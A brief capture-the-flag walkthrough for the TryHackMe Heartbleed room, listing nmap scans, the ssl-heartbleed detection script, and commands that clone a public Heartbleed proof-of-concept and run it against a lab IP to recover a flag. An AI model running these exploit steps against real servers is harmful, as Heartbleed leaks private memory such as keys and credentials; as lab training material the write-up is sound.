HeartBleed

Room Link: https://tryhackme.com/room/heartbleed

Initial Scan

Kali

nmap -A $VICTIM

TCP/443 - HTTPS

We can see the site is vulnerable to heartbleed

Kali

nmap -p 443 --script ssl-heartbleed $VICTIM

I had to run the exploit a couple times but eventually I found some interesting info. Most importantly the flag.

Kali

git clone https://github.com/mpgn/heartbleed-PoC.git
cd heartbleed-PoC/
python2.7 heartbleed-exploit.py 34.240.174.225